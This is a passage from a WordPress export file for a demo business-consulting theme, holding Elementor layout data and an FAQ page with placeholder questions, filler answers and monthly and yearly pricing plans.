live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]}},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"3f45b25","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"8a829f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0a0ed67","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ae65e25","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":400,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:14:{s:8:"iheading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:4;s:5:"title";i:4;s:11:"header_size";i:4;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:2:{s:14:"subtitle_style";i:4;s:11:"title_color";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:31;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:31;s:19:"_inline_size_tablet";i:17;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:8;s:13:"margin_mobile";i:2;s:6:"margin";i:4;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:1;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:15;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:8;s:16:"content_position";i:5;s:6:"layout";i:7;}s:17:"section_structure";a:1:{s:9:"structure";i:10;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:5:{s:7:"padding";i:11;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:8;s:11:"_element_id";i:3;s:11:"css_classes";i:3;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_color";i:1;s:16:"background_image";i:3;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:15:"background_size";i:3;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:3;s:4:"link";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:18:"style_text_section";a:1:{s:9:"per_color";i:4;}}}}s:9:"itabtitle";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"title_boxes";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:12:"radius_title";i:1;s:8:"title_bg";i:1;s:18:"title_active_color";i:1;s:15:"title_active_bg";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:4;s:10:"image_size";i:4;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:3:{s:32:"image_box_shadow_box_shadow_type";i:3;s:27:"image_box_shadow_box_shadow";i:3;s:19:"image_border_radius";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:8:"icon-box";a:3:{s:5:"count";i:6;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:6;s:10:"title_text";i:6;s:16:"description_text";i:6;s:8:"position";i:6;s:10:"title_size";i:6;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:6;s:10:"icon_space";i:6;s:9:"icon_size";i:6;s:6:"rotate";i:6;}s:21:"section_style_content";a:11:{s:18:"title_bottom_space";i:6;s:11:"title_color";i:6;s:27:"title_typography_typography";i:6;s:28:"title_typography_font_family";i:6;s:26:"title_typography_font_size";i:6;s:28:"title_typography_font_weight";i:6;s:28:"title_typography_line_height";i:6;s:17:"text_align_mobile";i:6;s:33:"description_typography_typography";i:2;s:34:"description_typography_font_family";i:2;s:34:"description_typography_font_weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:6;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:1:{s:4:"text";i:3;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:5:{s:8:"bg_title";i:1;s:11:"title_color";i:1;s:12:"title_border";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;}s:13:"style_content";a:4:{s:10:"bg_content";i:1;s:13:"content_color";i:1;s:29:"content_typography_typography";i:1;s:35:"content_typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>FAQs</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=566</guid>
		<description></description>
		<content:encoded><![CDATA[faqs	        <h3>Most Popular Questions</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you do fixed price or time and materials contracts? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you offer volume or loyalty discounts? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				What problems does business consulting typically solve? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How is the scope of a consulting project determined? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How long does a business consulting project last? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        flexible pricing plans	        <h3>Choose The Best Plan</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
            Billed Monthly
                <label>
                    <input type="checkbox">
                </label>
			Billed Yearly
				<h6>basic plan</h6>				<h2><sup>$</sup> 69</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 79</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 89</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-1.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>566</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[faqs]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[567]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1fad6c2","elType":"section","settings":{"padding":{"unit":"px","top":"117","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cfef8fb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b29ca39","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3d04547","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ba86566","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"4865c99","elType":"widget","settings":{"sub":"faqs","title":"Most Popular Questions","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"f714140","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"af5bfe2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0e107ea","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"531351e","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"2e8ff7b","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b0dc727"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b4483e5"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"f24ea6d"},{"acc_title":"Do you do fixed price or time and materials contracts?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"ceccd71"}],"_padding":{"unit":"px","top":"0","right":"10","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true},{"id":"a627a5f","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"8463953","elType":"widget","settings":{"ot_accs":[{"acc_title":"Do you offer volume or loyalty discounts?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"b0dc727"},{"acc_title":"What problems does business consulting typically solve?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"5b50501"},{"acc_title":"How is the scope of a consulting project determined?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"2928abe"},{"acc_title":"How long does a business consulting project last?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"f4ae810"}],"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"84019eb","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"82","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"6f925c9","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"70c78a1","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"a41d7e6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"152805f","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c53e4ac","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dcefd1a","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-faq.jpg","id":574},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"100","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a866378","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3d64e18","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2d57f68","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"2e06ec7","elType":"column","settings":{"_column_size":33,"_inline_size":53.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c669db8","elType":"widget","settings":{"sub":"flexible pricing plans","title":"Choose The Best Plan","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"7255b73","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","align":"center","text_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"48","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"51bfab0","elType":"widget","settings":{"title_left":"Billed Monthly","title_right":"Billed Yearly","title_color":"#FFFFFF","toggle_bg":"#FFFFFF33"},"elements":[],"widgetType":"iswitcher"}],"isInner":true},{"id":"06865b6","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"04bd296","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"monthly","layout":"full_width"},"elements":[{"id":"75f58b9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5d1e07a","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 69","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a910be5","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"14789ad","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 79","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a5e277a","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4f90658","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 89","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"e676d1e","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"yearly","layout":"full_width"},"elements":[{"id":"9729d97","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"194320d","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"88ccea0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"148d950","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"d27a889","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4fc8771","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"5ef0e76","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"789c4a0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b5a1c52","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01-1.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02-1.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03-1.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04-1.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05-1.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06-1.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
